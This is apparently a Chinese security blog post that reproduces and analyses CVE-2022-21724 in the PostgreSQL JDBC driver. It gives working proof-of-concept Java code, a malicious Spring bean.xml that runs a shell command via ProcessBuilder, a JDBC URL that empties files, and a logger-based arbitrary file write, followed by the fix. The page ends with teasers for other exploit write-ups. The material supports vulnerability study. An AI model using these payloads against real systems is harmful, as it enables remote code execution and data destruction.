关键词:
漏洞简介
在 PostgreSQL 数据库的 jdbc 驱动程序中发现一个安全漏洞。当攻击者控制 jdbc url 或者属性时,使用 PostgreSQL 数据库的系统将受到攻击。 pgjdbc 根据通过 authenticationPluginClassName
、sslhostnameverifier
、socketFactory
、sslfactory
、sslpasswordcallback
连接属性提供类名实例化插件实例。但是,驱动程序在实例化类之前没有验证类是否实现了预期的接口。这可能导致通过任意类加载远程代码执行。
影响范围:
9.4.1208 <=PgJDBC <42.2.25
42.3.0 <=PgJDBC < 42.3.2
【一一帮助安全学习,所有梓料获取处一一】
①网络安全学习路线
②20份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥网络安全必备书籍
⑦100个漏洞实战案例
⑧安全大厂内部教程
漏洞复现
创建 maven 项目,添加依赖
<!-- https://mvnrepository.com/artifact/org.postgresql/postgresql -->
<dependency>
<groupId>org.postgresql</groupId>
<artifactId>postgresql</artifactId>
<version>42.3.1</version>
</dependency>
<!-- https://mvnrepository.com/artifact/org.springframework/spring-context-support -->
<dependency>
<groupId>org.springframework</groupId>
<artifactId>spring-context-support</artifactId>
<version>5.3.23</version>
</dependency>
编写测试代码
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;
public class cve202221724
public static void main(String[] args) throws SQLException
String socketFactoryClass = "org.springframework.context.support.ClassPathXmlApplicationContext";
String socketFactoryArg = "http://127.0.0.1:8080/bean.xml";
String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/test/?socketFactory="+socketFactoryClass+ "&socketFactoryArg="+socketFactoryArg;
Connection connection = DriverManager.getConnection(jdbcUrl);
bean.xml
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:p="http://www.springframework.org/schema/p"
xsi:schemaLocation="http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans.xsd">
<!-- 普通方式创建类-->
<bean id="exec" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value>calc.exe</value>
</list>
</constructor-arg>
</bean>
</beans>
漏洞分析
任意代码执行 socketFactory/socketFactoryArg
先将调试后的流程大概画出
java.sql.DriverManager#getConnection(java.lang.String)
java.sql.DriverManager#getConnection(java.lang.String, java.util.Properties, java.lang.Class<?>)
利用 org.postgresql.Driver
的 jdbc 驱动去连接数据库
org.postgresql.Driver#connect
调用 makeConnection 去连接数据库
org.postgresql.Driver#makeConnection
org.postgresql.jdbc.PgConnection#PgConnection
org.postgresql.core.ConnectionFactory#openConnection
org.postgresql.core.v3.ConnectionFactoryImpl#openConnectionImpl
org.postgresql.core.SocketFactoryFactory#getSocketFactory
PGProperty 是枚举类型 其中的 get 方法是判断枚举项的值有没有传入的 properties,如果存在就查找返回,没有就返回默认值
SOCKET_FACTORY(
"socketFactory",
null,
"Specify a socket factory for socket creation"),
SOCKET_FACTORY_ARG(
"socketFactoryArg",
null,
"Argument forwarded to constructor of SocketFactory class."),
org.postgresql.util.ObjectFactory#instantiate
通过 newInstance 来实现对 ctor 类 的创建,同时 args 作为参数。构造方法中有且只有一个 String 参数的类就可以满足条件。
- org.apache.commons.jxpath.functions.ConstructorFunction
- org.apache.commons.jxpath.functions.MethodFunction
- java.io.FileOutputStream
通过利用 CVE-2017-17485 实现 Spring spel 执行任意命令 或者利用 FileOutputStream 将任意文件置空(jdbc:postgresql://127.0.0.1:5432/test/?socketFactory=java.io.FileOutputStream&socketFactoryArg=test.txt
)
任意代码执行 sslfactory/sslfactoryarg
<init>:85, ClassPathXmlApplicationContext (org.springframework.context.support)
newInstance0:-1, NativeConstructorAccessorImpl (sun.reflect)
newInstance:62, NativeConstructorAccessorImpl (sun.reflect)
newInstance:45, DelegatingConstructorAccessorImpl (sun.reflect)
newInstance:423, Constructor (java.lang.reflect)
instantiate:62, ObjectFactory (org.postgresql.util)
getSslSocketFactory:64, SocketFactoryFactory (org.postgresql.core)
convert:34, MakeSSL (org.postgresql.ssl)
enableSSL:546, ConnectionFactoryImpl (org.postgresql.core.v3)
tryConnect:151, ConnectionFactoryImpl (org.postgresql.core.v3)
openConnectionImpl:215, ConnectionFactoryImpl (org.postgresql.core.v3)
openConnection:51, ConnectionFactory (org.postgresql.core)
<init>:225, PgConnection (org.postgresql.jdbc)
makeConnection:466, Driver (org.postgresql)
connect:265, Driver (org.postgresql)
getConnection:664, DriverManager (java.sql)
getConnection:270, DriverManager (java.sql)
main:17, cve202221724
org.postgresql.core.v3.ConnectionFactoryImpl#openConnectionImpl
尝试与数据库进行连接
org.postgresql.core.v3.ConnectionFactoryImpl#tryConnect
建立连接后收到请求以 S
开头,进入 org.postgresql.ssl.MakeSSL#convert
org.postgresql.core.v3.ConnectionFactoryImpl#enableSSL
org.postgresql.ssl.MakeSSL#convert
org.postgresql.core.SocketFactoryFactory#getSslSocketFactory
任意文件写入 loggerLevel/loggerFile
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;
public class cve202221724
public static void main(String[] args) throws SQLException
String loggerLevel = "debug";
String loggerFile = "test.txt";
String shellContent="test";
String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/test?loggerLevel="+loggerLevel+"&loggerFile="+loggerFile+ "&"+shellContent;
Connection connection = DriverManager.getConnection(jdbcUrl);
org.postgresql.Driver#connect
org.postgresql.Driver#setupLoggerFromProperties
通过 设置扩展参数 LOGGER_FILE
指定日志文件保存位置,没有进行校验,所以可以跨目录的保存文件
生成临时文件,之后将日志信息保存到文件中
org.postgresql.Driver#connect
先通过 setupLoggerFromProperties 设定相关的参数 然后再利用 LOGGER.log
保存文件
漏洞修复
针对代码执行的漏洞而言,要求获取的类名必须是指定类的子类,否则就抛出异常
对于任意文件写入而言,高版本中移除了对日志文件的设定操作 setupLoggerFromProperties(props);
安全-wordpress小于等于4.6.1版本任意代码执行漏洞复现(i春秋)(代码片段)
文章目录一、实验环境二、漏洞复现[1].登录目标机[2].漏洞函数[3].语言包[4].重载语言包[5].RCE恶意代码运行一、实验环境实验链接环境版本操作机WindowsXP目标机Windows2003ServerSP2Wordpress小于等于4.6.1目标机账户密码administratorichunqiu二... 查看详情
路由器漏洞挖掘之dir-850/645命令执行漏洞复现(代码片段)
...由于参数拼接不当造成的。漏洞分析根据前一篇文章中的任意文件读取漏洞,在读取到DEVICE.ACCOUNT配置文件中的敏感信息之后,我们就可以进一步利用,达到命令执行的目的,进而getshell。php源代码代码如下:这里的server变量可... 查看详情
漏洞复现weblogic任意文件上传漏洞(代码片段)
【漏洞复现】Weblogic任意文件上传漏洞文章目录【漏洞复现】Weblogic任意文件上传漏洞0x01漏洞背景0x02漏洞环境0x03漏洞复现0x01漏洞背景Oracle7月更新中,修复了WeblogicWebServiceTestPage中一处任意文件上传漏洞,WebServiceTestPage在... 查看详情
漏洞复现weblogic任意文件上传漏洞(代码片段)
【漏洞复现】Weblogic任意文件上传漏洞文章目录【漏洞复现】Weblogic任意文件上传漏洞0x01漏洞背景0x02漏洞环境0x03漏洞复现0x01漏洞背景Oracle7月更新中,修复了WeblogicWebServiceTestPage中一处任意文件上传漏洞,WebServiceTestPage在... 查看详情
thinkphp2.x任意代码执行漏洞复现
Thinkphp2.x任意代码执行漏洞 影响版本:tp2.x tp3.0 漏洞影响:代码执行,写入一句话getshell 漏洞成因:在ThinkPHPThinkPHP2.x版本中,使用preg_replace的/e模式匹配路由:$res=preg_replace(\'@(\\w+)\'.$depr.\'([^\'.$dep 查看详情
cve-2020-5902简单复现(代码片段)
...过BIG-IP管理端口和/或自身IP对TMUI进行网络访问,以执行任意系统命令、创建或删除文件、禁用服务和/或执行任意Java代码。该漏洞可 查看详情
java安全-tomcat任意文件写入(cve-2017-12615)漏洞复现(代码片段)
Tomcat任意文件写入(CVE-2017-12615)当Tomcat运行在Windows主机上,且启用了HTTPPUT请求方法,攻击者通过构造的攻击请求向服务器上传包含任意代码的JSP文件,可造成任意代码执行受影响版本:Tomcat7.0.0–7.0.79... 查看详情
tomcat任意文件写入(cve-2017-12615)漏洞复现(代码片段)
一、漏洞原理影响范围:pacheTomcat7.0.0-7.0.81(默认配置)如果配置了默认servlet,则在9.0.1(Beta),8.5.23,8.0.47和7.0.82之前的所有Tomcat版本都包含所有操作系统上的潜在危险的远程执行代码(RCE&... 查看详情
漏洞复现weblogic任意文件上传漏洞(代码片段)
【漏洞复现】Weblogic任意文件上传漏洞文章目录【漏洞复现】Weblogic任意文件上传漏洞0x01漏洞背景0x02漏洞环境0x03漏洞复现0x01漏洞背景Oracle7月更新中,修复了WeblogicWebServiceTestPage中一处任意文件上传漏洞,WebServiceTestPage在... 查看详情
thinkcmf任意文件包含漏洞复现(代码片段)
这几天看到ThiknCMF存在任意文件包含漏洞,闲下来复现一下。搭建环境,放到服务器上。先来试试读取README文件http://127.0.0.1/?a=display&templateFile=REMADE.md emmm,好使,再来读读系统文件http://127.0.0.1/?a=display&templateFile=/etc/... 查看详情
安全-gitlab任意文件读取漏洞复现(cve-2016-9086)(代码片段)
...pose和vulhub,文章仅学习交流请勿用于非法用途。GitLab任意文件读取漏洞(CVE-2016-9086)和任意用户token泄露漏洞GitLabArbitraryFileDisclosure(CVE-2016-9086)影响版本GitLabCE/EEversions8.9、8.10、8.11、8.12、 查看详情
分析并复现apache核弹级漏洞,利用log4j2使目标服务器执行任意代码(代码片段)
...,ApacheLog4j2被曝光存在严重漏洞,可以随意执行任意远程代码,本贴将详细分析事故原因及实战复现此漏洞!一.事件详情1.事件经过2021年12月9日,国内多家机构监测到Apachelog4j存在任意代码执行漏洞,并紧... 查看详情
debecms环境搭建以及漏洞复现(代码片段)
...搭建 首页访问慢解决方案二、漏洞分析以及复现 任意修改前台用户密码 cookie伪造任意前台用户登录 前台文件上传漏洞 任意重置后台用户密码 后台任意文件上传总结前言 织梦内容管理系统(DedeCms)以简... 查看详情
f5big-ip远程代码执行漏洞复现(cve-2020-5902)(代码片段)
...远程攻击者通过向漏洞页面发送特制的请求包,可以造成任意Java代码执行。进而控制F5BIG-IP 查看详情
ciscoasa设备任意文件读取漏洞复现(cve-2020-3452)(代码片段)
漏洞内容文件读取漏洞概述:文件读取漏洞就是攻击者利用漏洞,可以越级对服务器端文件其他目录进行访问,以此来达到破坏、越权、获取信息等目的。本漏洞内容:思科自适应安全设备CiscoAdaptiveSecurityAppliance&... 查看详情
ciscoasa设备任意文件读取漏洞复现(cve-2020-3452)(代码片段)
漏洞内容文件读取漏洞概述:文件读取漏洞就是攻击者利用漏洞,可以越级对服务器端文件其他目录进行访问,以此来达到破坏、越权、获取信息等目的。本漏洞内容:思科自适应安全设备CiscoAdaptiveSecurityAppliance&... 查看详情
漏洞复现海洋cms6.28远程代码执行(代码片段)
【漏洞复现】海洋CMS6.28远程代码执行文章目录【漏洞复现】海洋CMS6.28远程代码执行一、漏洞背景二、漏洞原理三、漏洞复现一、漏洞背景海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频... 查看详情
网络安全漏洞复现与分析(代码片段)
...#xff0c;在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。影响版本OracleWebLogicServer10.3.6.0.0OracleWebLogicS 查看详情